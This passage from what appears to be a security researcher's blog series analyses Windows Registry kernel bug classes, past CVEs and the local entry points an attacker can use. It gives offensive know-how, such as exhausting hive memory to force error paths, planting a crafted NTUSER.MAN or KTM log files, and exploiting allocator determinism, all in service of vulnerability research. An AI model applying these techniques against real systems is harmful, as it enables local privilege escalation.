disclosure: Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller. This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file). Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.Race conditions: As a multithreaded environment, Windows allows for concurrent registry access by multiple threads. Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.Logic bugs: In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic. This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances. This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers. Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services. A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification. More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state. The specifics depend on how the privileged process uses the registry interface. If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this: Manual reference counting As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore, must be reference counted. The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption. So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs: Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed. However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker. Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper. As a result, none of these incrementations were protected against integer overflow. This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641). This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024. Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow. Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors. In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything. In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).When the reference count of a security descriptor reaches zero and is released, this operation is irreversible. There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all. This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed. A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one. If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.Aggressive self-healing and recovery As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing. The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered. Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail. Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view. It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure. However, from a security perspective, this behavior is not necessarily advantageous. Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it. In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it. In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation. A classic example of a vulnerability associated with this property is CVE-2023-38139. Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed. For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector. At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights. Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips. No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw. Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors). Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle. Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation. These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive. Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification. The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities. However, such instances rarely cause an immediate system crash or other visible side effects. Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw. However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor. The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load. This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz. This does not mean that they don't exist; their detection just becomes more challenging.Unclear boundaries between hard and conventional format requirements This point is related to the previous section. In the regf format, there are certain requirements that are fairly obvious and must be always met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user. However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required. Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code. We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future. The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice. This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules. In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy. Some examples of such constructs are presented below: Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value. However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object. However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags. However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.Allocated but unused cells: The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data. However, the loader does not require every cell marked "allocated" to be actively used. Similarly, security descriptors with a reference count of zero are typically deallocated. However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list. This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list. These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications. However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not unenforced by the loader: CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading. This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type. If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length. Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances. This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names. However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption. Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of the reg.exe command executions.CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive. For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5. However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability. As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file. If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.Susceptibility to mishandling OOM conditions Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme: NTSTATUS NtHighLevelOperation(...) {   NTSTATUS Status;   Status = HelperFunction1(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }   Status = HelperFunction2(...);   if (!NT_SUCCESS(Status)) {     //     // Clean up...     //     return Status;   }     //   // More calls...   //   return STATUS_SUCCESS; } Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on. The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks. Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter). In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer. A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors. The sign of the number is checked by the NT_SUCCESS macro. During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them. A common trait of all actions that modify data in the registry is that they allocate memory. The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePool group. If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller. And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways. So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size. Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited. And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not. Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools. The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines. The situation is even easier if the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive. However, even in system hives, this is often feasible. To perform data spraying on a given hive, we only need a single key granting us write permissions. For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill it to capacity. Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, this is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions. A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability. Considering all this, it is a fair assumption that a local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail. This opens up a large number of potential error paths to analyze. The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user: There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs. First, it stands to reason that on regular computers used by users, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory. This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone. Such rarely executed code paths are always a real treat for security researchers. The second reason is that proper error handling in code is inherently difficult. Many operations involve numerous steps that modify the hive's internal state. If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective). This requires the developer to be fully aware of all changes applied so far when implementing each error path. Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed. One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code: NTSTATUS CmpCommitRenameKeyUoW(_CM_KCB_UOW *uow) {   // ...   if (!CmpAddSubKeyEx(Hive, ParentKey, NewNameKey) ||       !CmpRemoveSubKey(Hive, ParentKey, OldNameKey)) {     CmpFreeKeyByCell(Hive, NewNameKey);     return STATUS_INSUFFICIENT_RESOURCES;   }   // ... } The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't. As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition. A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation, hive unloading. As there was no way to revert the state at the time of the OOM, the vulnerability was fixed by Microsoft by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools and thus there is no longer a physical possibility of them failing. Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error. This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.Susceptibility to mishandling partial successes The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified. However, some functions don't adhere to this operational model. Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible. If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes. This introduces a third possible output state for such functions: complete success, partial success, and complete failure. This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative. In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed. Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them. A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions. The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error. On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation. An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.Overall complexity introduced over time One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced. This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a full-time registry expert that has worked on it full-time over a period of months or years. I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users. Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white. However, over time, more and more shades of gray were being continuously added, departing from the basic assumptions: The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.Registry virtualization has introduced further uncertainty into key operations. When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one. Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry. At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units. This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive. Additionally, the semantics of certain objects and their fields have been altered. Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive. Layered keys have disrupted this dependency. Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name. Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today. The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together. This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry. This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact. Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft. The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below: Some examples of bugs caused by incorrect interactions between these mechanisms include CVE-2023-21675, CVE-2023-21748, CVE-2023-35356, CVE-2023-35357 and CVE-2023-35358.Entry points This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.Hive loading Let's start with the operation of loading user-controlled hives. Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length. Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers). When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses. It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems. It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.App hives The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface. It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators. Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on. In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism. It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors: They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy. This special path is further protected from references by a fully qualified path, which also reduces their usefulness in some offensive applications.The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyW API or its corresponding syscall from the NtUnloadKey family.Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurity function or RegCreateKeyExW with a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.KTM transactions are unconditionally blocked for app hives. Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs. Even if binary control of the hive is not strictly required, it can still be valuable. This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place. By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.User hives and Mandatory User Profiles Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\NTUSER.DAT mounted under \Registry\User\, or in other words, HKCU) or the user classes hive (C:\Users\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem. The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s),  and then log out. User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved. The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation). This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal. However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy. Once the NTUSER.MAN file has been created and loaded, there is no way to delete it by the same user, as it will always be loaded by the system upon login, effectively blocking access to it. A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633. They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU. Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.Log file parsing: .LOG/.LOG1/.LOG2 One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive. This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded. Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load. Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family. Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. Another one is the "incremental log file", a slightly more modern and complex format introduced in Windows 8.1 to address performance issues that plagued the previous version. Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE"). These formats are well-documented in two unofficial regf documentations: GitHub: libyal/libregf and GitHub: msuhanov/regf.  Additional information can be found in the "Stable storage" and "Incremental logging" subsections of the Windows Internals (Part 2, 7th Edition) book and its earlier editions. From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface. On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery. The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.Log file parsing: KTM logs Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit. These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic. KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags. To utilize them, a transaction object must first be created using the CreateTransaction API. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransacted registry functions. Finally, the entire transaction is committed via CommitTransaction. Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again. To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file. When a hive is loaded, the system checks for unapplied changes in these .blf files. If any are found, it deserializes the individual records and attempts to redo all the actions described within them. This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph. Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited. The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in. Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled. This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time. Historically, the handling of KTM logs has been affected by a significant number of security issues. Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378. Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293. However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since. I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface. Therefore, it could be safely removed or, at the very least, actually fixed.Direct registry operations through standard syscalls Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel. These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker. These actions have been summarized at the beginning of blog post #2, and should probably be familiar by now. As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall: Operation name Registry API name(s) System call(s) Internal kernel handler (if different than syscall) Load hive RegLoadKey RegLoadAppKey NtLoadKeyNtLoadKey2 NtLoadKeyEx NtLoadKey3 - Count open subkeys in hive - NtQueryOpenSubKeys - Flush hive RegFlushKey NtFlushKey - Open key RegOpenKeyEx RegOpenKeyTransacted NtOpenKey NtOpenKeyEx NtOpenKeyTransacted NtOpenKeyTransactedEx CmpParseKey Create key RegCreateKeyEx RegCreateKeyTransacted NtCreateKey NtCreateKeyTransacted CmpParseKey Delete key RegDeleteKeyExRegDeleteKeyTransacted NtDeleteKey - Rename key RegRenameKey NtRenameKey - Set key security RegSetKeySecurity NtSetSecurityObject CmpSecurityMethod Query key security RegGetKeySecurity NtQuerySecurityObject CmpSecurityMethod Set key information - NtSetInformationKey - Query key information RegQueryInfoKey NtQueryKey - Enumerate subkeys RegEnumKeyEx NtEnumerateKey - Notify on key change RegNotifyChangeKeyValue NtNotifyChangeKey NtNotifyChangeMultipleKeys - Query key path - NtQueryObject CmpQueryKeyName Close key handle RegCloseKey NtClose CmpCloseKeyObject CmpDeleteKeyObject Set value RegSetValueEx NtSetValueKey - Delete value RegDeleteValue NtDeleteValueKey - Enumerate values RegEnumValue NtEnumerateValueKey - Query value data RegQueryValueEx NtQueryValueKey - Query multiple values RegQueryMultipleValues NtQueryMultipleValueKey - Some additional comments:A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag. Loading standard hives, using the RegLoadKey function, is reserved for administrators only. However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended"). I also chose those that are the 